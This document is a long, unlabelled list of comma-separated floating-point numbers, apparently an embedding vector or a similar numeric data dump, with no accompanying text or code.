-0.03023732453584671, -0.0227276012301445, -0.002180796582251787, -0.01049377117305994, -0.015103398822247982, 0.00917346403002739, -0.02810041233897209, -0.023231301456689835, 0.0069907596334815025, -0.03525907173752785, 0.027993565425276756, -0.0016685096779838204, 0.008814767934381962, 0.01363808661699295, -0.012661212123930454, -0.035350654274225235, -0.007280769292265177, 0.016881616786122322, -0.015141557902097702, -0.030359433963894844, 0.03177895396947861, 0.0010980300139635801, -0.017461635172367096, -0.03904446214437485, -0.047256313264369965, 0.059070393443107605, -0.001562617952004075, 0.020895959809422493, 0.0021159257739782333, 0.007975266315042973, 0.007731047458946705, -0.003558342345058918, 0.007547883316874504, 0.01451574731618166, -0.0024612664710730314, 0.019308539107441902, -0.00004266075848136097, 0.038617078214883804, 0.012294883839786053, -0.009600847028195858, -0.027856193482875824, 0.000060488244344014674, -0.004914900753647089, 0.0023963956627994776, -0.012882535345852375, 0.0023639604914933443, 0.02455924078822136, -0.009028458967804909, 0.05366705358028412, -0.010470875538885593, 0.018316401168704033, -0.01340913213789463, 0.02280391938984394, -0.03773178532719612, 0.034068506211042404, 0.030756289139389992, 0.010715094394981861, -0.01049377117305994, 0.00210257014259696, 0.013058067299425602, 0.022636018693447113, -0.012928326614201069, 0.006147441919893026, -0.0002402835089014843, 0.005033194087445736, -0.016408441588282585, -0.003323663491755724, 0.021994944661855698, -0.007112869061529636, 0.00205677910707891, -0.005185830872505903, 0.009875592775642872, -0.013943360187113285, 0.031015772372484207, -0.001131419325247407, 0.026421407237648964, -0.00396092189475894, -0.009967174381017685, -0.0020109880715608597, -0.004918716847896576, -0.02312445640563965, 0.037701256573200226, 0.00409066304564476, 0.014973657205700874, -0.025108732283115387, 0.017599008977413177, -0.022452855482697487, -0.024147121235728264, 0.009219255298376083, -0.0028466740623116493, -0.010554825887084007, 0.006960232276469469, -0.0066167996264994144, -0.07228872925043106, -0.03980764374136925, 0.0011924740392714739, -0.009539792314171791, -0.003392350161448121, 0.006277183070778847, -0.0015282747335731983, -0.017293734475970268, -0.01811797358095646, 0.026940373703837395, 0.018514828756451607, -0.04447832703590393, 0.030023634433746338, 0.03470958024263382, -0.015019448474049568, 0.05320914462208748, 0.007929475046694279, -0.029596250504255295, -0.009005563333630562, 0.013172544538974762, 0.01941538415849209, 0.03263372182846069, 0.03150421008467674, 0.016866352409124374, 0.0042204041965305805, 0.015706313773989677, 0.004678314086049795, -0.03281688317656517, -0.011768287047743797, 0.010516666807234287, -0.012455152347683907, 0.002388763939961791, -0.031870536506175995, -0.023841848596930504, -0.002577651757746935, 0.013607559725642204, -0.01216514315456152, 0.05024799332022667, 0.010150338523089886, 0.005685715936124325, -0.02092648856341839, 0.02114017866551876, -0.026238244026899338, 0.009219255298376083, 0.02752039209008217, 0.003491563955321908, 0.0025032414123415947, 0.04084557294845581, -0.012745162472128868, -0.024452395737171173, 0.030664708465337753, 0.007734863553196192, -0.011447750963270664, -0.0019346697954460979, -0.01432495191693306, 0.0053384676575660706, 0.0010779964504763484, 0.011432486586272717, 0.002529952907934785, -0.005796377547085285, 0.007261689752340317, -0.004571468569338322, -0.019812239333987236, 0.003594593610614538, 0.018621673807501793, -0.008066847920417786, 0.017156362533569336, -0.0031481313053518534, 0.009219255298376083, -0.017385317012667656, -0.024116594344377518, 0.010173234157264233, -0.000382545666070655, -0.006078755483031273, -0.01216514315456152, 0.013691509142518044, -0.0053193881176412106, -0.02433028630912304, -0.022712336853146553, 0.007700520101934671, -0.019506966695189476, -0.01575210504233837, -0.0021655329037457705, 0.0016513379523530602, 0.007379983086138964, -0.00935662817209959, 0.00632678996771574, 0.012775689363479614, -0.003987633157521486, -0.02455924078822136, 0.0016875892179086804, -0.008471335284411907, 0.018377454951405525, 0.015324722044169903, -0.03742651268839836, 0.0005270735127851367, -0.0017896649660542607, 0.042860377579927444, -0.02622297964990139, -0.027993565425276756, 0.020560160279273987, -0.02159808948636055, 0.0026730496902018785, -0.0401739738881588, -0.0030336538329720497, 0.02568875253200531, 0.038922350853681564, -0.013966255821287632, -0.008440808393061161, 0.009600847028195858, 0.016713716089725494, -0.0075631472282111645, -0.05082801356911659, 0.04044871777296066, 0.040662411600351334, -0.030878398567438126, 0.017049515619874, -0.029428349807858467, -0.04881320893764496, -0.01147827785462141, -0.0043921200558543205, -0.025932971388101578, -0.05055326595902443, 0.008967404253780842, 0.020499104633927345, -0.05272070690989494, -0.02918413281440735, -0.006819043308496475, 0.01344729121774435, -0.023536574095487595, 0.028848331421613693, -0.025032414123415947, -0.007490644697099924, -0.04002133756875992, 0.015263667330145836, 0.01833166368305683, 0.011959083378314972, 0.03275582939386368, 0.025520851835608482, -0.030725762248039246, 0.0008719370234757662, 0.00818895734846592, 0.00517438305541873, -0.007937107235193253, 0.036571748554706573, 0.031092090532183647, -0.019659603014588356, -0.024040276184678078, 0.05320914462208748, -0.01114247739315033, 0.0250018872320652, -0.07009076327085495, -0.002031975658610463, 0.034434832632541656, 0.024650823324918747, -0.009181096218526363, -0.026772473007440567, 0.021720198914408684, -0.023002346977591515, 0.0064641633071005344, -0.0379149504005909, 0.04282984882593155, 0.02167440764605999, 0.01136380061507225, -0.02893991395831108, -0.0371517650783062, -0.008463703095912933, 0.003413337515667081, -0.00039065448800101876, 0.03593067452311516, -0.013859409838914871, -0.036571748554706573, -0.020285414531826973, -0.017263207584619522, 0.016622133553028107, 0.02138439752161503, 0.031092090532183647, 0.025337688624858856, -0.002201783936470747, -0.012134615331888199, -0.06093256175518036, 0.0048309508711099625, -0.052323851734399796, -0.04105926677584648, 0.009684797376394272, 0.02819199301302433, -0.030206797644495964, -0.022147580981254578, 0.03031364269554615, 0.006002437323331833, 0.04606574773788452, 0.000929175759665668, 0.02400974929332733, 0.025108732283115387, -0.00727313756942749, -0.0023124455474317074, -0.05125539377331734, -0.021949153393507004, 0.01344729121774435, 0.012813848443329334, 0.003949474077671766, -0.014111260883510113, 0.002980231074616313, 0.0038941430393606424, 0.04643207788467407, 0.05900933966040611, 0.0024612664710730314, 0.019064320251345634, -0.02939782291650772, -0.007685256656259298, -0.03849497064948082, -0.03342743217945099, 0.04054030030965805, 0.018896419554948807, -0.019827503710985184, 0.005113328341394663, 0.0022361271549016237, 0.032694775611162186, 0.007975266315042973, -0.017690589651465416, -0.027154063805937767, -0.008692658506333828, 0.014004414901137352, -0.01530945859849453, 0.00515530351549387, -0.010142707265913486, 0.009639006108045578, -0.006853386759757996, 0.029046759009361267, -0.005903223529458046, -0.015217876061797142, 0.020743323490023613, -0.021185969933867455, -0.015416303649544716, -0.02819199301302433, -0.037029657512903214, -0.041639283299446106, -0.019873294979333878, -0.024040276184678078, 0.012829112820327282, -0.012554366141557693, 0.027627237141132355, -0.030130479484796524, -0.01848430186510086, -0.017095306888222694, -0.03736545890569687, 0.01781269907951355, -0.01712583564221859, 0.03431272506713867, 0.00917346403002739, 0.011646178551018238, -0.02320077456533909, 0.02628403529524803, 0.0027150248643010855, 0.010783781297504902, 0.012760425917804241, -0.002262838650494814, -0.034373778849840164, 0.014027310535311699, -0.020285414531826973, 0.009188727475702763, 0.02123176120221615, 0.007727231364697218, 0.01993434876203537, -0.030786817893385887, 0.028909385204315186, 0.0003327002632431686, 0.013103858567774296, 0.020193831995129585, 0.0010131258750334382, 0.0009768747258931398, 0.003037469694390893, 0.002243759110569954, 0.019659603014588356, -0.000027248031983617693, -0.009532160125672817, 0.0035087354481220245, 0.014447061344981194, -0.018209554255008698, -0.011463014408946037, 0.01614896021783352, -0.01888115704059601, -0.011951451189815998, -0.054308127611875534, 0.026406144723296165, 0.004682130180299282, 0.004067767411470413, -0.01781269907951355, 0.04707314819097519, -0.003709071082994342, 0.0272761732339859, 0.022468117997050285, -0.017934808507561684, -0.0004452698049135506, -0.04826371744275093, -0.011546964757144451, -0.017904281616210938, 0.0284209493547678, 0.019293274730443954, -0.033824287354946136, -0.015240771695971489, -0.03806758671998978, -0.014332583174109459, -0.02719985507428646, 0.011600387282669544, 0.013325181789696217, 0.002623442793264985, -0.02494083158671856, 0.02719985507428646, 0.011829341761767864, -0.005330835934728384, -0.035045381635427475, 0.0071281325072050095, 0.015118662267923355, -0.0003224449756089598, 0.0029974025674164295, 0.006937336642295122, 0.011089053936302662, 0.0009205899550579488, -0.03522854298353195, -0.010768516920506954, -0.005346099380403757, -0.030130479484796524, 0.018545355647802353, 0.009478737600147724, -0.01781269907951355, -0.004048687871545553, 0.000873367942404002, -0.00311569613404572, -0.026161925867199898, -0.006941152736544609, 0.0075402515940368176, -0.02926045097410679, -0.01584368757903576, -0.029886260628700256, 0.0003312692861072719, -0.006876281928271055, 0.004911085125058889, -0.013088595122098923, 0.02153703384101391, 0.029306240379810333, -0.010112179443240166, -0.010699830949306488, 0.019873294979333878, -0.009516896679997444, -0.004102110397070646, 0.0033446510788053274, 0.00303174601867795, -0.003407613839954138, -0.023551838472485542, 0.006010069046169519, 0.013744932599365711, -0.011989610269665718, -0.02729143761098385, 0.006467978935688734, -0.021048597991466522, -0.025963498279452324, -0.00014071192708797753, -0.022391799837350845, -0.016835825517773628, 0.007223530672490597, -0.00848659873008728, 0.02181178145110607, -0.03046628087759018, 0.0023029057774692774, 0.03162631765007973, -0.0074830129742622375, 0.01576736755669117, -0.030344171449542046, -0.022941291332244873, -0.0010541470255702734, -0.003186290618032217, -0.010516666807234287, 0.01985803060233593, 0.010051124729216099, -0.02295655570924282, -0.00399908097460866, -0.03623594716191292, -0.00935662817209959, -0.006872466299682856, 0.0059299347922205925, 0.036266472190618515, -0.01443942915648222, -0.0022647466976195574, 0.02400974929332733, -0.02356710284948349, -0.01871325634419918, 0.00409447867423296, 0.0363580547273159, 0.021552298218011856, 0.01895747520029545, -0.02871095761656761, 0.009303205646574497, 0.009745851159095764, 0.012630684301257133, 0.051194339990615845, -0.005327019840478897, 0.022788655012845993, -0.005670452490448952, 0.013287022709846497, -0.04032661020755768, -0.012974116951227188, 0.010799044743180275, -0.024956095963716507, -0.0033446510788053274, 0.022529173642396927, 0.026711417362093925, 0.014561538584530354, 0.02622297964990139, 0.023735003545880318, 0.024421866983175278, -0.01015797071158886, -0.00022215790522750467, 0.001581697491928935, -0.002928716130554676, 0.02478819526731968, 0.006471795029938221, -0.007628017570823431, 0.011249322444200516, -0.0014977473765611649, -0.026543516665697098, -0.01243225671350956, -0.02947414107620716, -0.02175072580575943, 0.01337860431522131, 0.014027310535311699, -0.011852237395942211, 0.004712657071650028, -0.002919176360592246, -0.006700749974697828, 0.009089513681828976, 0.009150568395853043, -0.004014344420284033, 0.03568645566701889, -0.02492556907236576, -0.02213231846690178, 0.010150338523089886, 0.022407064214348793, -0.007135764695703983, 0.0022590227890759706, -0.016652660444378853, 0.005162935703992844, -0.00309661659412086, 0.028543058782815933, 0.020331205800175667, 0.03135157376527786, 0.029199395328760147, 0.03147368133068085, -0.015935268253087997, 0.018514828756451607, -0.042707741260528564, -0.0061588897369802, -0.00617415364831686, -0.014904971234500408, 0.024605032056570053, -0.00818895734846592, 0.013393867760896683, -0.01878957450389862, -0.010470875538885593, 0.04640154913067818, -0.022330746054649353, -0.033457957208156586, -0.003987633157521486, -0.03455694392323494, -0.005349915474653244, -0.008082112297415733, -0.031412627547979355, -0.009120041504502296, 0.0026310747489333153, -0.016927406191825867, 0.0010217117378488183, 0.020270150154829025, 0.01697319746017456, -0.013256494887173176, 0.00011149632337037474, -0.0075822267681360245, 0.024681350216269493, 0.008204220794141293, -0.027703555300831795, -0.022223899140954018, -0.021201234310865402, -0.010882995091378689, 0.024116594344377518, -0.0008705060463398695, 0.05507131293416023, 0.006387844681739807, 0.009898488409817219, -0.010402189567685127, 0.01443179789930582, -0.02530715987086296, -0.016545815393328667, -0.00043716098298318684, -0.005231622140854597, 0.02326182834804058, -0.011203532107174397, 0.02446765825152397, 0.010989840142428875, -0.0008418866782449186, 0.009990070015192032, 0.055132366716861725, -0.021781252697110176, -0.034526415169239044, 0.0032912283204495907, 0.017095306888222694, 0.00396092189475894, 0.006342053879052401, -0.007006023079156876, -0.01136380061507225, -0.03620541840791702, 0.024070803076028824, -0.02570401504635811, -0.007097605150192976, 0.020590687170624733, 0.003834996372461319, -0.008425544016063213, -0.009898488409817219, 0.056414514780044556, -0.0023353411816060543, -0.000642981962300837, 0.010699830949306488, 0.005784929729998112, -0.009974806569516659, -0.01334044523537159, 0.011882765218615532, 0.008059216663241386, 0.011096686124801636, -0.0181942917406559, 0.0024669901467859745, 0.014294424094259739, -0.04261615872383118, 0.00010708416812121868, -0.016545815393328667, 0.021018069237470627, 0.007353271823376417, 0.019827503710985184, -0.004613443277776241, 0.00924978218972683, -0.018438510596752167, -0.05827668309211731, -0.03858654946088791, 0.005590318236500025, -0.003388534067198634, -0.007845524698495865, -0.02516978792846203, -0.013966255821287632, 0.005643741227686405, 0.0010255275992676616, 0.01842324621975422, -0.00016217646771110594, -0.010478507727384567, -0.008463703095912933, 0.03532012552022934, -0.007967634126543999, 0.027260910719633102, 0.041944559663534164, -0.010913521982729435, -0.02628403529524803, -0.028207257390022278, 0.007303664926439524, -0.005548343062400818, -0.013019908219575882, 0.03934973478317261, 0.00905898679047823, -0.026711417362093925, 0.0064832428470253944, 0.004972139839082956, -0.02697090059518814, -0.00042022785055451095, -0.001525412779301405, 0.029046759009361267, -0.0013670522021129727, -0.05659767985343933, -0.028527794405817986, 0.0010980300139635801, 0.0070670777931809425, -0.016942670568823814, 0.004407383967190981, -0.016683189198374748, 0.05082801356911659, 0.0071662915870547295, -0.027154063805937767, -0.029275713488459587, 0.030069423839449883, -0.019827503710985184, 0.021689672023057938, -0.0048080552369356155, -0.02591770701110363, 0.017553217709064484, -0.01834692806005478, -0.013103858567774296, 0.0037472303956747055, 0.003651832463219762, -0.007231162395328283, 0.01834692806005478, -0.016271069645881653, 0.02182704396545887, -0.005033194087445736, -0.012157510966062546, 0.0023009979631751776, 0.028741486370563507, -0.028741486370563507, -0.006910625379532576, 0.04417305439710617, -0.003968553617596626, 0.023475520312786102, 0.002623442793264985, 0.0034763002768158913, 0.01643897034227848, 0.03431272506713867, 0.04197508469223976, -0.01614896021783352, -0.023902902379631996, 0.0071090529672801495, -0.012302516028285027, 0.023399202153086662, -0.012027770280838013, -0.006353501696139574, 0.007853156886994839, 0.024833986535668373, -0.03135157376527786, 0.008715554140508175, 0.010440348647534847, -0.0007684302399866283, -0.012233829125761986, 0.0016189026646316051, 0.023093929514288902, 0.0181942917406559, -0.05348388850688934, 0.003285504411906004, 0.010829571634531021, 0.021704934537410736, -0.030344171449542046, -0.009761115536093712, -0.0015731117455288768, 0.04047924652695656, -0.038922350853681564, -0.009669532999396324, -0.010089283809065819, -0.016912143677473068, 0.019064320251345634, -0.0008662131149321795, -0.009570319205522537, 0.0371212400496006, 0.033152684569358826, -0.029077285900712013, 0.01917116530239582, 0.014034941792488098, 0.01348545029759407, -0.00313477567397058, 0.00939478725194931, 0.008654499426484108, 0.0024421866983175278, 0.04438674449920654, -0.01842324621975422, -0.0017190704820677638, -0.01811797358095646, -0.008013425394892693, -0.03309163078665733, -0.02288023754954338, -0.03455694392323494, -0.025490324944257736, -0.019888559356331825, 0.005796377547085285, 0.007158659864217043, 0.000030303745006676763, 0.049667973071336746, 0.01598105952143669, 0.01947643980383873, 0.0037663099355995655, 0.015889476984739304, -0.03098524548113346, 0.015027080662548542, -0.05351441726088524, 0.006704566068947315, 0.04310459643602371, -0.012813848443329334, -0.008631603792309761, -0.0371517650783062, -0.009768746793270111, -0.02759671024978161, -0.016728978604078293, -0.017308998852968216, 0.010035861283540726, -0.03388534113764763, 0.017400581389665604, -0.004426463507115841, 0.004548572935163975, -0.015950532630085945, -0.02410132996737957, -0.02658930793404579, 0.004995035007596016, -0.014241001568734646, -0.015317089855670929, -0.02219337224960327, 0.0025356768164783716, -0.026039816439151764, 0.027947774156928062, 0.02251390926539898, -0.012508575804531574, 0.0043577770702540874, -0.03348848596215248, 0.00504082627594471, 0.006395476404577494, -0.041730865836143494, 0.008051584474742413, 0.019293274730443954, -0.04099820926785469, -0.014233369380235672, 0.009577951394021511, 0.04237193986773491, 0.008280539885163307, 0.04267721250653267, -0.005739138927310705, 0.0047889756970107555, 0.00415171729400754, -0.0371212400496006, -0.023536574095487595, -0.014668384566903114, 0.0013947176048532128, -0.011920924298465252, -0.02138439752161503, -0.0011247415095567703, -0.0012659303611144423, -0.001324123120866716, -0.021353870630264282, -0.03855602443218231, -0.04826371744275093, 0.008997932076454163, -0.0032721487805247307, -0.04801949858665466, -0.0102342888712883, -0.01636265218257904, 0.022529173642396927, -0.02257496491074562, -0.008646867237985134, 0.0606272853910923, 0.03400745242834091, -0.009348995983600616, -0.0029039126820862293, -0.009951910935342312, 0.014836284331977367, 0.002711209002882242, -0.0021235577296465635, 0.01015797071158886, -0.014668384566903114, -0.01337860431522131, -0.01773638091981411, -0.012447521090507507, -0.01643897034227848, 0.008005793206393719, -0.0035087354481220245, 0.03602225333452225, -0.018911683931946754, 0.004743184428662062, -0.006563377100974321, -0.015355248935520649, -0.015858950093388557, 0.004590548109263182, -0.018453773111104965, 0.002342972904443741, 0.022101789712905884, 0.03910551592707634, 0.014195210300385952, 0.013241231441497803, -0.00048652940313331783, -0.020422786474227905, -0.021628616377711296, -0.01810270920395851, -0.004590548109263182, 0.014202842488884926, 0.0002250198449473828, -0.03293899446725845, -0.0004106880514882505, 0.028604112565517426, -0.001117109670303762, -0.010928785428404808, -0.01011981163173914, 0.026802999898791313, -0.04310459643602371, 0.012455152347683907, 0.004254747182130814, 0.01788901723921299, 0.007536435965448618, -0.03132104501128197, 0.023383937776088715, -0.007811181712895632, -0.005674268119037151, 0.02295655570924282, -0.021994944661855698, -0.04948480799794197, -0.021109651774168015, 0.011035631410777569, 0.017385317012667656, -0.020514369010925293, 0.01895747520029545, 0.014920234680175781, 0.04304354265332222, 0.016790034249424934, 0.0004426463565323502, 0.010035861283540726, 0.006399292498826981, -0.024192912504076958, 0.00414790166541934, -0.019003266468644142, -0.007093789521604776, 0.011539332568645477, -0.011775919236242771, 0.04502781853079796, 0.02494083158671856, 0.017064779996871948, -0.015591836534440517, -0.005365178920328617, -0.011089053936302662, -0.01970539428293705, -0.010051124729216099, 0.014836284331977367, -0.032694775611162186, 0.00507898535579443, 0.00004918955164612271, 0.0011104318546131253, 0.013294653967022896, -0.009890856221318245, 0.009974806569516659, -0.0272761732339859, -0.0159200057387352, -0.010898258537054062, 0.02613139897584915, -0.05284281447529793, -0.012233829125761986, 0.031259991228580475, 0.02887885831296444, 0.010844836011528969, -0.04069293662905693, 0.009455841965973377, -0.02266654558479786, -0.03696860373020172, -0.027031954377889633, -0.01454627513885498, 0.00617796927690506, -0.04502781853079796, 0.03388534113764763, 0.008860559202730656, 0.02893991395831108, -0.017370052635669708, 0.0200869869440794, -0.016469497233629227, -0.005849800538271666, -0.022407064214348793, -0.0016503840452060103, 0.03122946247458458, 0.029275713488459587, 0.00305082555860281, -0.005540711339563131, 0.0013632363406941295, -0.029687833040952682, -0.030344171449542046, 0.020957015454769135, 0.021872835233807564, 0.01257726177573204, -0.007876052521169186, 0.033000048249959946, 0.014447061344981194, 0.013851777650415897, -0.020041195675730705, 0.0008671670802868903, -0.030878398567438126, 0.022834446281194687, -0.0007359949522651732, 0.0011810262221843004, -0.0005170567310415208, -0.019583284854888916, -0.009333732537925243, -0.0016322584124282002, 0.01878957450389862, -0.053697582334280014, -0.00041593494825065136, -0.02855832129716873, -0.0009539792081341147, 0.022605491802096367, -0.021201234310865402, -0.026238244026899338, -0.008349225856363773, -0.01772111840546131, -0.0018039747374132276, 0.009402419440448284, -0.004781343974173069, -0.005075169261544943, 0.07906579971313477, 0.013691509142518044, 0.0070708938874304295, 0.014202842488884926, -0.012592525221407413, 0.006700749974697828, 0.016118433326482773, 0.012592525221407413, 0.0023754083085805178, -0.011638546362519264, 0.04719525948166847, 0.004567652475088835, -0.017003726214170456, -0.02085017040371895, 0.013157281093299389, 0.025123996660113335, -0.006506138015538454, 0.006166521459817886, 0.026802999898791313, -0.0017887110589072108, -0.018316401168704033, 0.0036537402775138617, -0.004724104888737202, -0.021659143269062042, -0.01242462545633316, 0.012531470507383347, -0.005914670880883932, 0.015965795144438744, 0.037853896617889404, -0.0006105466745793819, 0.012027770280838013, 0.001422383007593453, 0.006689302157610655, -0.014332583174109459, -0.010745622217655182, -0.0038369044195860624, 0.023750266060233116, -0.000727409147657454, 0.010615880601108074, -0.016622133553028107, -0.010631144046783447, -0.01314964983612299, -0.020514369010925293, 0.006670222617685795, -0.010325871407985687, -0.0010426993248984218, 0.012035401538014412, 0.00004966654159943573, -0.006586272269487381, 0.01865220069885254, 0.00520872650668025, -0.0016189026646316051, 0.017537953332066536, -0.00412882212549448, 0.0036346607375890017, 0.006563377100974321, -0.016545815393328667, 0.015935268253087997, -0.0014729439280927181, 0.00898266863077879, 0.005239253863692284, 0.006746540777385235, 0.006433635950088501, 0.008463703095912933, 0.003436233149841428, -0.021262288093566895, -0.013874673284590244, -0.0185758825391531, 0.008738449774682522, -0.026161925867199898, -0.0069526005536317825, -0.012905430980026722, 0.010989840142428875, 0.007746311370283365, 0.03135157376527786, 0.005624661222100258, 0.018697991967201233, -0.024360813200473785, 0.03312215954065323, -0.006693118251860142, -0.0053804428316652775, 0.015706313773989677, 0.0024631742853671312, -0.013844146393239498, -0.00009235711331712082, 0.014416533522307873, -0.02037699520587921, -0.018163764849305153, 0.0223612729460001, 0.0012630685232579708, 0.03211475536227226, 0.02863463945686817, -0.021506506949663162, 0.019125375896692276, 0.004060135688632727, 0.0295504592359066, -0.02962677739560604, 0.01978171244263649, -0.005960462149232626, -0.022178107872605324, 0.01534761767834425, 0.014805757440626621, 0.011089053936302662, 0.014966025948524475, 0.009265045635402203, -0.0009563641506247222, -0.00530412420630455, 0.014126524329185486, 0.0013756380649283528, 0.017171625047922134, -0.010051124729216099, -0.022910764440894127, -0.003092800499871373, 0.018377454951405525, -0.004544756840914488, -0.013439659029245377, 0.010104548186063766, -0.01432495191693306, 0.01344729121774435, -0.0026367984246462584, -0.02106386050581932, -0.027413547039031982, 0.011699601076543331, -0.01764480024576187, 0.01356176845729351, 0.020834906026721, -0.007376167457550764, 0.0054376814514398575, 0.0005809733411297202, 0.015484990552067757, 0.045882582664489746, 0.008471335284411907, 0.01436311099678278, 0.0060634920373559, 0.03321373835206032, -0.010737990029156208, -0.005372811108827591, -0.0007474427111446857, 0.01643897034227848, -0.01553078182041645, -0.012890166603028774, 0.0144012700766325, 0.02605508081614971, 0.0325726643204689, 0.01326412707567215, -0.021720198914408684, -0.010035861283540726, 0.017400581389665604, -0.00505990581586957, 0.00006090561146265827, 0.01840798370540142, -0.0004858139145653695, -0.0035163674037903547, 0.003655648324638605, 0.025444533675909042, -0.020834906026721, -0.019812239333987236, 0.010356398299336433, 0.006746540777385235, -0.04374567046761513, 0.024742403998970985, -0.021430188789963722, 0.03956342488527298, -0.0034572207368910313, -0.018133236095309258, 0.0269098449498415, 0.005575054325163364, -0.04948480799794197, -0.03776231408119202, -0.0011276034638285637, 0.03873918950557709, 0.003842628328129649, -0.02719985507428646, 0.012714634649455547, 0.008532389998435974, 0.013294653967022896, 0.02001066878437996, 0.011775919236242771, 0.010394557379186153, -0.0038044690154492855, 0.01469891145825386, -0.007574595045298338, 0.0020834906026721, 0.006841938942670822, 0.001802066690288484, 0.00040090977563522756, 0.009165831841528416, -0.005090433172881603, -0.035198017954826355, 0.018621673807501793, 0.0020949384197592735, 0.04371514171361923, -0.013668614439666271, -0.02857358567416668, -0.0015921912854537368, 0.02136913500726223, -0.00825764425098896, -0.004953059833496809, 0.000929175759665668, -0.03996028006076813, -0.0034190614242106676, -0.007669992744922638, 0.0030431936029344797, -0.02144545316696167, 0.029504669830203056, -0.02524610608816147, -0.016332123428583145, -0.014095996506512165, 0.006956416182219982, -0.013699141331017017, -0.0010789504740387201, -0.013783091679215431, 0.0023735002614557743, -0.006925888825207949, 0.01682056114077568, -0.009379523806273937, -0.03232844918966293, -0.0028275942895561457, -0.005594133865088224, 0.006029148586094379, 0.023368675261735916, 0.0163015965372324, 0.001253528636880219, 0.03016100637614727, 0.004666866268962622, -0.005094248801469803, 0.005128592252731323, -0.019903821870684624, 0.015049976296722889, -0.006315342150628567, 0.006830491125583649, -0.020941751077771187, 0.00723497848957777, 0.008761345408856869, 0.009944279678165913, -0.020941751077771187, 0.03318321332335472, -0.017690589651465416, 0.02735249139368534, 0.01970539428293705, 0.004125006031244993, -0.030176270753145218, -0.018621673807501793, 0.022391799837350845, -0.013119122013449669, -0.000337947130901739, 0.024360813200473785, -0.020422786474227905, -0.008280539885163307, -0.005430049728602171, 0.015584204345941544, -0.0006606305832974613, 0.01651528850197792, -0.015393408946692944, -0.002337248995900154, 0.01144011877477169, -0.000039798818761482835, 0.0024097515270113945, 0.01628633216023445, -0.016622133553028107, -0.0015454463427886367, -0.021689672023057938, -0.006872466299682856, 0.007952370680868626, -0.015133925713598728, 0.010486139915883541, -0.013439659029245377, -0.02706248126924038, -0.0031099722255021334, 0.02448292262852192, 0.009272677823901176, 0.0075593311339616776, 0.006513770204037428, 0.00403724005445838, -0.03590014576911926, -0.011798814870417118, 0.003224449697881937, -0.041181374341249466, 0.025826124474406242, 0.006685486063361168, 0.011859869584441185, -0.005895591340959072, -0.023628156632184982, -0.0401434451341629, 0.03348848596215248, -0.03303057700395584, -0.02471187710762024, -0.02077385038137436, -0.004777527879923582, 0.011539332568645477, -0.02130807936191559, 0.03144315630197525, -0.006105466745793819, -0.007788286078721285, -0.010600617155432701, 0.016622133553028107, 0.001708576804958284, 0.018743783235549927, 0.020804379135370255, -0.021185969933867455, 0.014202842488884926, 0.011249322444200516, 0.016484761610627174, 0.023399202153086662, 0.0026501542888581753, 0.0019184522097930312, 0.006777068134397268, -0.02037699520587921, 0.016728978604078293, 0.00207585864700377, 0.01888115704059601, 0.0023849480785429478, -0.04643207788467407, 0.02100280672311783, -0.01242462545633316, 0.006128362379968166, 0.012218565680086613, 0.005884143523871899, -0.02758144773542881, 0.019430648535490036, -0.008349225856363773, -0.016851088032126427, 0.021338606253266335, 0.02484925091266632, 0.007868420332670212, 0.0007555515039712191, -0.02281918190419674, 0.0005084709264338017, -0.00623520789667964, -0.009486368857324123, 0.00619323318824172, 0.011768287047743797, 0.005506367888301611, 0.00723879411816597, -0.011562228202819824, -0.03309163078665733, 0.010745622217655182, 0.019522231072187424, -0.0348622165620327, -0.007780654355883598, -0.011226427741348743, 0.018224818632006645, -0.002190336352214217, 0.007532619871199131, 0.0026215349789708853, -0.017629535868763924, 0.008807135745882988, 0.0033999818842858076, 0.011913292109966278, 0.005502552259713411, -0.013348077423870564, 0.017461635172367096, 0.0034991956781595945, 0.021109651774168015, -0.010035861283540726, 0.0007889408152550459, -0.013882305473089218, 0.02507820539176464, -0.02204073593020439, 0.018774310126900673, -0.033366378396749496, -0.007635649759322405, -0.011966715566813946, 0.00921162310987711, -0.008707921952009201, -0.009333732537925243, -0.003684267634525895, 0.020590687170624733, 0.021170707419514656, -0.008433176204562187, -0.013577031902968884, -0.009867960587143898, 0.004716473165899515, 0.009226886555552483, -0.012752793729305267, -0.00738761480897665, 0.014393637888133526, 0.0003377086541149765, 0.010509034618735313, 0.010722726583480835, -0.022620754316449165, 0.004105926491320133, -0.007898948155343533, 0.006475610658526421, -0.0016923591028898954, 0.0021960600279271603, 0.0059108552522957325, -0.024452395737171173, 0.012188038788735867, -0.0011609926586970687, -0.0017715393332764506, -0.03306110203266144, -0.016759507358074188, 0.026558781042695045, -0.032236866652965546, 0.02547506056725979, 0.007711967919021845, 0.007074709981679916, 0.012852007523179054, 0.013309918344020844, 0.0014090272597968578, -0.01128748245537281, -0.01363808661699295, 0.005449129268527031, -0.015484990552067757, 0.009906119666993618, -0.0010808584047481418, 0.006998391356319189, 0.016774769872426987, -0.02114017866551876, 0.013874673284590244, 0.013172544538974762, 0.017003726214170456, 0.004521861672401428, -0.0424635224044323, 0.017675327137112617, 0.007151028141379356, 0.007731047458946705, -0.039746589958667755, 0.004476070404052734, -0.020728060975670815, 0.0004493242013268173, -0.023002346977591515, -0.004601995926350355, 0.0356253981590271, -0.011188267730176449, -0.017415843904018402, -0.007647097110748291, 0.0018955566920340061, 0.009142937138676643, -0.0035602503921836615, 0.0029592434875667095, 0.01978171244263649, -0.009623742662370205, -0.009112409316003323, 0.018133236095309258, 0.014973657205700874, -0.012119351886212826, 0.017324263229966164, 0.003323663491755724, -0.004002896603196859, -0.020560160279273987, -0.02440660446882248, 0.0047889756970107555, -0.01118063647300005, -0.020590687170624733, 0.0011829342693090439, 0.002270470606163144, 0.003008850384503603, -0.012012505903840065, 0.015011817216873169, -0.00042070483323186636, 0.010715094394981861, 0.007376167457550764, 0.005620845593512058, 0.02515452355146408, -0.009081882424652576, 0.016255805268883705, -0.013569400645792484, 0.027093010023236275, -0.005391890648752451, -0.0043005384504795074, -0.001384223811328411, 0.003949474077671766, 0.017446372658014297, 0.018133236095309258, -0.000314336153678596, -0.012966485694050789, 0.0042814589105546474, -0.015042344108223915, -0.005334651563316584, 0.02448292262852192, -0.011379064060747623, 0.0002988339983858168, 0.028680430725216866, 0.005082801450043917, -0.011027999222278595, 0.01261542085558176, -0.015378144569694996, 0.0031424073968082666, 0.0007679532864131033, 0.017782172188162804, -0.016942670568823814, 0.008578181266784668, 0.001271654269658029, -0.0012354031205177307, -0.01795007288455963, -0.0025185050908476114, -0.01257726177573204, 0.0018430878408253193, -0.004972139839082956, 0.0034610365983098745, 0.00078846380347386, 0.025642961263656616, -0.015454462729394436, -0.029000967741012573, 0.0005471070762723684, 0.020483842119574547, 0.028909385204315186, -0.002571927849203348, 